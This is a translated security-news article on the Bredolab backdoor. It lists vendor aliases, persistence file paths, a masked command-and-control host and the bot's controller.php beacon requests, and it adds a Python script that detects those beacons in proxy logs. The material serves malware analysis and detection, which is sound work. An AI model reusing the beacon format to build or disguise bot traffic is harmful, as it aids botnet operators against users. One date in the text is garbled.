Learn about Backdoor.Win32.Bredolab.eua malware
The term backdoor refers to malware created to install and distribute malicious code on users' computers ...
QuanTriMang.com - The term backdoor refers to malicious software created to install and distribute malicious code on the user's computer. In terms of functionality and technique, a backdoor closely resembles remote administration software. These malicious applications are built to do whatever the attacker wants: send and receive data, launch, use and delete any file, display error messages, and restart the computer automatically …
Such programs are often used to link infected computers into a botnet or zombie network, and the people behind it can easily gather a large number of machines; this has become a standard tool for attackers carrying out their schemes.
Some backdoors can also spread and behave exactly like a Net-Worm. The two are distinguished by how they propagate: a backdoor cannot replicate and spread on its own, in contrast to a Net-Worm, but on a special command from its operators it will spread and multiply in uncontrollable numbers.
In this article we will discuss Backdoor.Win32.Bredolab.eua (the Kaspersky name), also known as:
- Trojan:Bredolab!N (McAfee)
- Mal/BredoPk-B (Sophos)
- Trj/Sinowal.DW (Panda)
- TrojanDownloader:Win32/Bredolab.AA (MS(OneCare))
- Trojan.Botnetlog.126 (DrWeb)
- Win32/TrojanDownloader.Bredolab.BE trojan (Nod32)
- Trojan.Downloader.Bredolab.EK (BitDef7)
- Backdoor.Bredolab.CNS (VirusBuster)
- Trojan.Win32.Bredolab (Ikarus)
- Cryptic.AGF (AVG)
- TR/Crypt.XPACK.Gen (AVIRA)
- W32/Bredolab.TP (Norman)
- Trojan.Win32.Generic.521C7EF8 (Rising)
- Backdoor.Win32.Bredolab.eua [AVP] (FSecure)
- Trojan-Downloader.Win32.Bredolab (Sunbelt)
- Backdoor.Bredolab.CNS (VirusBusterBeta)
It was discovered on June 3, 2010 at 16:16 GMT, the detection update was released on 4/6/2010 at 3:28 GMT, and the detailed analysis was published on 12/12 7/2010 at 11:33 GMT.
Detailed technical description
In essence, malicious programs of this kind are controlled from a dedicated server and are used to download other malware onto the infected computer.
Like many other malicious programs, it ensures it runs at boot by copying its executable into the Startup folder:
%Startup%\siszpe32.exe
and creates a file of the form:
%appdata%\avdrn.dat
As its payload, it connects to the server:
http://*****lo.ru
and sends the following request:
GET /new/controller.php?action=bot&entity_list=&uid=&first=1&guid=880941764&v=15&rnd=8520045
In response the program receives commands and the code for other malware to download; these are saved in the following location and launched automatically:
%windir%\Temp.exe
It then sends a further request:
GET /new/controller.php?action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;1260188029:unique_start;1260433697:unique_start;1260199741:unique_start
This data informs the server that the victim's computer has been infected.
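As an added example (not from the original article or from Kaspersky's description), the following Python flags Bredolab-style controller.php beacons in proxy log lines and decodes the report's entity field into UTC timestamps. The log line format and the client addresses are assumed; the masked host and the two requests are taken from the description above.

```python
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Beacon shape described above: GET /new/controller.php with
# action=bot (check-in) or action=report, always carrying rnd=.
BEACON_PATH = "/new/controller.php"
BEACON_ACTIONS = {"bot", "report"}

# Constructed proxy log lines: "<client> <method> <url>". Lines 1-2 reuse
# the requests from the description; lines 3-4 are benign look-alikes.
SAMPLE_LOG = """\
10.0.0.5 GET http://*****lo.ru/new/controller.php?action=bot&entity_list=&uid=&first=1&guid=880941764&v=15&rnd=8520045
10.0.0.5 GET http://*****lo.ru/new/controller.php?action=report&guid=0&rnd=8520045&guid=&entity=1260187840:unique_start;1260188029:unique_start
10.0.0.9 GET http://example.test/index.php?action=bot&page=2
10.0.0.7 GET http://intranet.test/new/controller.php?action=login
"""

def parse_query(query):
    """Split on '&' only (the entity field uses ';' internally) and keep
    the first value of a repeated key, since guid appears twice."""
    fields = {}
    for part in query.split("&"):
        key, _, value = part.partition("=")
        fields.setdefault(key, value)
    return fields

def parse_entity(value):
    """Turn '1260187840:unique_start;...' into (UTC time, tag) pairs."""
    pairs = []
    for item in filter(None, value.split(";")):
        ts, _, tag = item.partition(":")
        if ts.isdigit():
            when = datetime.fromtimestamp(int(ts), tz=timezone.utc)
            pairs.append((when.strftime("%Y-%m-%d %H:%M:%S"), tag))
    return pairs

def match_beacon(line):
    """Return a dict describing a Bredolab-style beacon, or None."""
    parts = line.split()
    if len(parts) != 3 or parts[1] != "GET":
        return None
    client, _, url = parts
    split = urlsplit(url)
    if split.path != BEACON_PATH:
        return None
    fields = parse_query(split.query)
    action = fields.get("action", "")
    if action not in BEACON_ACTIONS or "rnd" not in fields:
        return None
    return {"client": client, "host": split.hostname, "action": action,
            "guid": fields.get("guid", ""), "rnd": fields["rnd"],
            "entity": parse_entity(fields.get("entity", ""))}

def scan_log(text):
    """Apply match_beacon to every log line and return the hits."""
    return [hit for hit in map(match_beacon, text.splitlines()) if hit]
```

The decoded entity timestamps (December 2009) show how much history a single report request can leak about when the bot was started.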